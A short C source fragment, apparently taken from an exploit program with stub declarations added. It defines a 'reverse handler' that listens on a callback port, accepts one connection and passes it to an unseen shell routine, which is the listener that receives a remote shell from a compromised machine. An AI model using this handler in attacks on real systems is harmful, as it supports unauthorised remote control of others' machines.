
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int socklen_t ;
typedef int servaddr ;
typedef int cliaddr ;


 int AF_INET ;
 int INADDR_ANY ;
 int SOCK_STREAM ;
 int accept (int,struct sockaddr*,int*) ;
 int bind (int,struct sockaddr*,int) ;
 int bzero (struct sockaddr_in*,int) ;
 int close (int) ;
 int exit (int) ;
 int htonl (int ) ;
 int htons (unsigned short) ;
 char* inet_ntoa (TYPE_1__) ;
 int listen (int,int) ;
 int printf (char*,...) ;
 int shell (int,char*) ;
 int socket (int ,int ,int ) ;

void
start_reverse_handler ( unsigned short cbport )
{
 int s1, s2;
 struct sockaddr_in cliaddr, servaddr;
 socklen_t clilen = sizeof ( cliaddr );

 bzero ( &servaddr, sizeof ( servaddr ) );
 servaddr.sin_family = AF_INET;
 servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
 servaddr.sin_port = htons ( cbport );

 printf ( "--[ starting reverse handler [port: %u]...", cbport );
 if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
 {
  printf ( "socket failed!\n" );
  exit ( 1 );
 }
 bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
 if ( listen ( s1, 1 ) == -1 )
 {
  printf ( "listen failed!\n" );
  exit ( 1 );
 }
 printf ( "done!\n" );
 if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
 {
  printf ( "accept failed!\n" );
  exit ( 1 );
 }
 close ( s1 );
 printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
 shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ) );
 close ( s2 );
}
